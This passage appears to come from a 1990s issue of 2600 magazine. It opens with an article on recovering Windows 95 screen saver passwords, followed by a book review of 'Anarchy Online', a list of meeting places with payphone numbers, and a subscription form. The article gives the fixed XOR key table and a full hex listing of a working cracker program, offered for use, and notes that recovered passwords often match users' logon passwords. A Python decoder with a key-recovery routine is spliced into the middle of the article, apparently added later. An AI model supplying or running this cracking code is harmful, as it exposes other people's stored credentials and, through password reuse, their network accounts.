Why find out what the pass phrase is, you ask? Because a lot of times users are stupid, lazy, have bad memory, or any combination of these and reuse passwords or schemes any time a key is needed. This is especially true in network environments and even more so when 95 is used as the workstation OS. In such systems, there is the possibility of changing the logon password and the screen saver password at the same time. I wonder how that can be useful?

Back to finding out what the phrase is. 95 has been rumored to use dual case. Let me clear this rumor. It does not. It uses the “all upper” coding for the password like 3.1. The maximum length of the screen saver password is 14 characters long. It will allow you to enter longer passwords, but 95 will act screwy; it won’t require the password from screen saver, it will hang, etc.

OK, so we have the file. Look for the string “ScreenSaver_Data”. After this is an even string of numbers and letters ending in 00. There is the encrypted pass phrase. The pass phrase is different from 3.1 in that 95 uses what I call “encrypted-couplets” meaning that for every character in the phrase, there are two encryption values. The first encrypted couplet (EC) is the first hex digit of the unencrypted ascii value, and the second EC is the second hex digit. For example, say the first two hex digits after the string “ScreenSaver_Data” are 31 41 (1A in ASCII). The 31 represents (after decryption) 5 and the 41, 2. Put the digits together and you have 52h, R in ASCII. Keep this concept in mind while decoding the EC’s because the decryption scheme is the same for each value, only the key changes. Refer to the sample program (below) that shows the scheme.

Of course you will have to do the rest of the program to get the final phrase, but I am giving the key values.

Character  Value
1          48h
2          ee
3          76
4          1d
5          67
6          69
7          a1
8          1b
9          7a
10         8c
11         47
12         f8
13         54
14         95

For those of you who would like a functioning program, use whichever debugger or editor to enter the following values. You can disassemble and modify it at will. Keep it free.

BD 82 00 BE 38 01 3E 8A 
46 00 3E 8A 66 01 3C 0D 
74 22 45 45 80 FC 40 72 
03 80 C4 09 3C 40 72 02 
04 09 25 0F 0F B1 04 D2 
E0 02 C4 8A 24 46 30 E0 
CD 29 EB D2 B4 4C CD 21 
48 EE 76 1D 67 69 A1 1B 
7A 8C 47 F8 54 95 

File size: 70

After you save it, you type in the encrypted string in caps after the file name, i.e., crk95 (.com) 1AAA26473D28. It will type out the password on the next line, RDPZZA in the example. I will make a fancier one when I have time and it will be free on the net, probably under the name crk95.com (I hope).
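The same scheme in Python, as an added illustration that is not the article's crk95 program: it decodes and encodes the ScreenSaver_Data string with the 14 key bytes the article lists (following the nibble handling of the listing), and recover_key shows why a fixed-key XOR is only obfuscation, since one known password gives back the key. The sample value 1AAA26473D28 is the article's own example.

```python
"""Win95 "ScreenSaver_Data" decoder and encoder (added illustration).

The stored value is the password (upper-cased, at most 14 characters),
XORed byte by byte with a fixed 14-byte key, and written out as pairs of
uppercase hex digits (the article's "encrypted couplets"), ending in 00.
"""

# Fixed key table, as given in the article (the last 14 bytes of crk95.com).
KEY = bytes([0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1,
             0x1B, 0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95])

# Win95 caps the screen saver password at 14 characters (the key length).
MAX_LEN = len(KEY)


def hex_digit(ch: str) -> int:
    """Convert one hex digit the way the crk95 listing does.

    '0'-'9' are below 0x40 and need no adjustment; letters get 9 added so
    that 'A' (0x41) becomes 0x4A; then only the low nibble is kept.
    """
    code = ord(ch)
    if code >= 0x40:
        code += 9
    return code & 0x0F


def couplets_to_bytes(digits: str) -> bytes:
    """Turn the hex-digit string into raw bytes, high nibble first."""
    if len(digits) % 2:
        raise ValueError("stored value must hold an even number of hex digits")
    return bytes((hex_digit(digits[i]) << 4) | hex_digit(digits[i + 1])
                 for i in range(0, len(digits), 2))


def decode(stored: str) -> str:
    """Recover the password from the hex string found after ScreenSaver_Data.

    A trailing NUL (the 00 that ends the string in user.dat) and whitespace
    are ignored; digits are expected in uppercase, as Win95 writes them.
    """
    raw = couplets_to_bytes(stored.strip().rstrip("\x00"))
    if len(raw) > MAX_LEN:
        raise ValueError("more than %d characters; Win95 does not support this"
                         % MAX_LEN)
    # Same XOR for every byte, only the key byte changes, as the article says.
    return "".join(chr(b ^ k) for b, k in zip(raw, KEY))


def encode(password: str) -> str:
    """Produce the stored form of a password (upper-cased, as Win95 does)."""
    plain = password.upper().encode("ascii")
    if len(plain) > MAX_LEN:
        raise ValueError("password longer than %d characters" % MAX_LEN)
    return "".join("%02X" % (p ^ k) for p, k in zip(plain, KEY))


def recover_key(stored: str, known_password: str) -> bytes:
    """Why this is obfuscation, not encryption: with a fixed key, one known
    password and its stored form give back every key byte they cover."""
    raw = couplets_to_bytes(stored.strip().rstrip("\x00"))
    plain = known_password.upper().encode("ascii")
    return bytes(s ^ p for s, p in zip(raw, plain))


if __name__ == "__main__":
    # The article's worked example: 1AAA26473D28 decodes to RDPZZA.
    sample = "1AAA26473D28"
    print(decode(sample))                        # RDPZZA
    print(encode("rdpzza") == sample)            # True
    print(recover_key(sample, "RDPZZA").hex())   # 48ee761d6769
```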
Anarchy Online 

by Charles Platt 

$24.95, 365 pages, illustrated 
Published by Black Sheep Books 
Review by Scott Skinner 


Probably the last thing the world needs 
right now is YABOH (Yet Another Book On 
Hackers). After all, is there anything left in 
this genre that hasn’t already been ade- 
quately covered/exploited by such notewor- 
thies as The Cuckoo’s Egg, Cyberpunk, The 
Hacker Crackdown, Masters of Deception, 
The Fugitive Game, Takedown, The Cy- 
berthief and the Samurai, and slews of other 
lesser known works? This question was 
foremost on my mind as I plowed through 
the first chapter of Charles Platt’s Anarchy 
Online, which begins with a tiresome recap 
of hacker ways and means. By the end of 
the book, I was happy I endured, for several 
elements combine to make Anarchy a 
unique and worthy read, and which allows 
me to answer my aforementioned question 
with a definitive yes. 

Whereas another recent publication, 
Katie Hafner and Matthew Lyon’s Where 
Wizards Stay Up Late: The Origins of the 
Internet, paints a vivid portrait of the Inter- 
net’s genesis, Anarchy picks up where Wiz- 
ards leaves off, discussing the complex 
social issues and corresponding power 
struggles contributing to the “anarchy” on- 
line. Anarchy, then, is very much aware of 
its predecessors, featuring and acknowledg- 
ing Katie Hafner and other authors as it ex- 
amines topics ranging from free speech 
issues to online pornography to digital cash. 
Indeed, perhaps the only common thread 
that ties these chapters together is their 
close relation to the Internet (with one note- 
worthy exception being its excellent exami- 
nation of satellite video piracy). In this 
respect, Platt breaks from the usual thematic 
literary approach and instead presents us 
with a second-order view rich in meta- 
content, a book about other books and is- 
sues relating to the Internet. This second or- 
der view allows Platt to make observations 
and judgments that are usually reserved for 
the critic. For example, examining not only 
the Kevin Mitnick saga, but the books writ- 
ten about Kevin, and the authors of those 
books, and the books written about those 
authors, etc. While Anarchy exercises hind- 
sight to the extreme, it also breaks some 
new ground, especially with its considera- 
tion and analysis of some of the most recent 
issues affecting netizens, including the In- 
ternet’s inevitable entrenchment into the 
world of commerce. 

Overall, Platt takes a positive approach 
toward the Internet, acknowledging its 
many problems (including hackers), but 
also putting those problems into perspec- 
tive. Anarchy, for example, points out that 
many “ex-hackers” from the past are now 
Internet Service Providers of the present, 
using their unique perspectives to secure 
free speech and online rights, in contrast to 
the extreme censorship that characterizes 
such conservative giants as AOL and Com- 
puserve. 

On the down side, Anarchy lacks both 
source notes and an index, both of which 
are of inestimable value for those of us hop- 
ing to find our names mentioned some- 
where in its pages. Additionally, I was 
disappointed that the story of Edward Cum- 
mings (a.k.a. Bernie S.) was not mentioned, 
as his ordeal is perhaps the clearest demon- 
stration yet of a chaotic and unfettered In- 
ternet nonetheless resulting in a powerful 
political gestalt capable of empowering in- 
dividuals and grass-roots efforts, and initi- 
ating change. 
[Cover text: Legislators, Prosecutors, Thieves, Christians, Crackers, Hackers, Anarchists, Supremacists, Fetishists, Scammers, Spammers, Cypherpunks ... and their Epic Struggle to Control the Internet]
Anchorage, AK 
Diamond Center Food Court, smoking section, 
near payphones. 
Ann Arbor, MI 
Galleria on South University. 
Atlanta 
Lennox Mall Food Court. 
Baltimore 
Baltimore Inner Harbor, Harborplace Food 
Court, Second Floor, across from the 
Newscenter. Payphone: (410) 547-9361. 
Baton Rouge, LA 
in The LSU Union Building, between the Tiger 
Pause and Swensen's Ice Cream, next to the 
payphones. Payphone numbers: (504) 387- 
9520, 9538, 9618, 9722, 9733, 9735. 
Bloomington, MN 
Mall of America, north side food court, across 
from Burger King and the bank of payphones 
that don’t take incoming calls. 
Boise, ID 
Student Union building at Boise State 
University near payphones. Payphone num- 
bers: (208) 342-9432, 9559, 9700, 9798. 
Boston 
Prudential Center Plaza, Terrace Food Court. 
Payphones: (617) 236-6582, 6583, 6584, 6585, 
try to bypass the carrier. 
Buffalo 
Eastern Hills Mall (Clarence) by lockers near 
food court. 
Charlotte, NC 
South Park Mall in the food court near the pay- 
phones. 
Chicago 
3rd Coast Cafe, 1260 North Dearborn. 
Cincinnati 
Kenwood Town Center, food court. 
Cleveland 
Coventry Arabica, Cleveland Heights, back 
room smoking section. 
Columbia, SC 
Richland Fashion Mall, 2nd level, food court, by 
the payphones in the smoking section. 6 pm. 
Columbus, OH 
Convention Center, lower level near the pay- 
phones. 
Dallas 
Mama's Pizza, northeast corner of Campbell 
Rd. and Preston Rd. in North Dallas, first floor 
of the two story strip section. 7 pm. Payphone: 
(214) 931-3850. 
Houston 
Food court under the stairs in Galleria 2, next to 
McDonalds. 
Kansas City 
Food court at the Oak Park Mall in Overland 
Park, Kansas. 
Los Angeles 
Union Station, corner of Macy & Alameda. 
inside main entrance by bank of phones. 
Payphones: (213) 972-9519, 9520; 625-9923, 
9924. 
Louisville, KY 
The Mall, St. Matthew's food court. 
Madison, WI 
Union South (227 S. Randall St.) on the main 
level by the payphones. Payphone numbers: 
(608) 251-9746, 9914, 9916, 9923. 
Miami 
Dadeland Shopping Center in front of the 
Coffee Beanery by Victoria Station restaurant. 
Nashville 
Bean Central Cafe, intersection of West End 
Ave. and 29th Ave. S. three blocks west of 
Vanderbilt campus. 
New Orleans 
Food Court of Lakeside Shopping Center by 
Cafe du Monde. Payphones: (504) 835-8769, 
8778, and 8833 - good luck getting around the 
carrier. 





New York City 
Citicorp Center, in the lobby, near the pay- 
phones, 153 E 53rd St., between Lexington & 
3rd. 
Orlando, FL 
Fashion Square Mall in the food court between 
Hovan Gourmet & Panda Express. Payphones: 
(407) 895-5238, 7373, 4648; 896-9708; 895- 
6044, 6055. 
Ottawa, ONT (Canada) 
Cafe Wim on Sussex, a block down from 
Rideau Street. 7 pm. 
Philadelphia 
30th Street Amtrak Station at 30th & Market, 
under the “Stairwell 6" sign. Payphones: (215) 
222-9880, 9881, 9779, 9799, 9632; 387-9751. 
Phoenix 
Barnes and Noble by Metro Center. 
Pittsburgh 
Carnegie Mellon University student center in 
the lobby. 
Portland, ME 
Maine Mall by the bench at the food court door. 
Portland, OR 
Lloyd Center Mall, third level at the food court. 
Raleigh, NC 
Crabtree Valley Mall, food court. 
Reno, NV 
Meadow Wood Mall, Palms Food Court by 
Sbarro, 3-9 pm. 
Rochester, NY 
Marketplace Mall food court. 
St. Louis 
Galleria, Highway 40 and Brentwood, lower 
level, food court area, by the theaters. 
Sacramento 
Downtown Plaza food court, upstairs by the the- 
atre. Payphones: (916) 442-9543, 9644 - 
bypass the carrier. 
San Francisco 
4 Embarcadero Plaza (inside). Payphones: 
(415) 398-9803, 9804, 9805, 9806. 
Seattle 
Washington State Convention Center, first floor. 
Toronto, ONT (Canada) 
DotCom Cafe, 57 Duncan Street, just south- 
east of the Muchmusic building on Queen St. 
7 pm. 
Vancouver, BC (Canada) 
Pacific Centre Food Fair, one level down from 
street level by payphones, 4 pm to 9 pm. 
Washington DC 
Pentagon City Mall in the food court. 






AUSTRALIA, EUROPE, ASIA, SOUTH AMERICA 





Aberdeen, Scotland 
Outside, Marks & Spencers, next to the 
Grampian Transport kiosk. 
Adelaide, Australia 
Outside Cafe Celsius, near the Academy 
Cinema, on the corner of Grenfell and Pulteney 
Streets. 


Belo Horizonte, Brazil 
Pelego's Bar at Assufeng, near the payphone. 6 
pm. 
Buenos Aires, Argentina 

In the bar at San Jose 05. 

Bristol, England 
By the phones outside the 
Almshouse/Galleries, Merchant Street, 
Broadmead. Payphones: +44-117-9299011, 
9294437. 6:45 pm. 

Granada, Spain 
Ciberteca Granada in Pza. Einstein near the 
Campus de Fuentenueva. 

Halmstad, Sweden 
At the end of the town square (Stora Torget), to 
the right of the bakery (Tre Hjartan). At the pay- 
phones. 

London, England 
Trocadero Shopping Center (near Picadilly 
Circus) next to VR machines. 7 pm to 8pm. 

Manchester, England 
Cyberia Internet Cafe on Oxford Rd next to St. 
Peters Square. 6 pm. 

Melbourne, Australia 
Melbourne Central Shopping Centre at the 
Swanston Street entrance near the public 
phones. 

Munich, Germany 
Hauptbahnhof (Central Station), first floor, by 
Burger King and the payphones. (One stop on 
the S-Bahn from Hackerbruecke - 
Hackerbridge!) Birthplace of Hacker-Pschorr 
beer. Payphones: +49-89-591-835, +49-89- 
558-541, 542, 543, 544, 545. 

New Delhi, India 
Priya Cinema Complex, near the Allen Solly 
Showroom. 
Paris, France 
Place d'Italie XIII, in front of the Grand Ecran 
Cinema. 6-7 pm. 
Rio de Janeiro, Brazil 
Rio Sul Shopping Center, Fun Club Night Club. 


All meetings take place on the first 
Friday of the month from approxi- 
mately 5 pm to 8 pm local time 
unless otherwise noted. To start a 
meeting, call (516) 751-2600 or send 
email to meetings@2600.com. 








PLAN AHEAD 





NOW IS THE TIME TO PLAN FOR FUTURE EXPANSION. IF YOU 
SPEND A GREAT DEAL OF TIME IN FRONT OF COMPUTERS 
CONSUMING LARGE QUANTITIES OF JUNK FOOD, YOU YOURSELF 
WILL PROBABLY BE EXPANDING SOMETIME IN THE FUTURE. 
WHY WAIT? GET YOUR DOUBLE XTRA LARGE 2600 T-SHIRT 

TODAY AT OUR LOW 20TH CENTURY PRICES! 


I'M A TRADITIONALIST. SEND ME AN OLD-FASHIONED 
BLUE BOX SHIRT. MY SIZE IS: 


I WANT TO TRY SOMETHING NEW. SEND ME AN ELITE 
MICHELANGELO VIRUS SHIRT. MY SIZE IS: 


[ ] 1 shirt/$15    [ ] 2 shirts/$26 


WAIT! I'M NOT FINISHED! SEND ME: 
INDIVIDUAL SUBSCRIPTION 
[ ] 1 year/$21    [ ] 2 years/$38    [ ] 3 years/$54 


CORPORATE SUBSCRIPTION 
[ ] 1 year/$50    [ ] 2 years/$90    [ ] 3 years/$125 


OVERSEAS SUBSCRIPTION 
[ ] 1 year, individual/$30    [ ] 1 year, corporate/$65 


LIFETIME SUBSCRIPTION 
[ ] $260 (you will get 2600 for as long as you can stand it) 
(also includes back issues from 1984, 1985, and 1986) 


BACK ISSUES (invaluable reference material) 
[ ] 1984/$25    [ ] 1985/$25    [ ] 1986/$25    [ ] 1987/$25 
[ ] 1988/$25    [ ] 1989/$25    [ ] 1990/$25    [ ] 1991/$25 
[ ] 1992/$25    [ ] 1993/$25    [ ] 1994/$25    [ ] 1995/$25 
(OVERSEAS: ADD $5 PER YEAR OF BACK ISSUES) 


(individual back issues for 1988 to present are $6.25 each, $7.50 overseas) 


Send orders to: 2600, PO Box 752, Middle Island, NY 11953 
(Make sure you enclose your address!) 


TOTAL AMOUNT ENCLOSED: 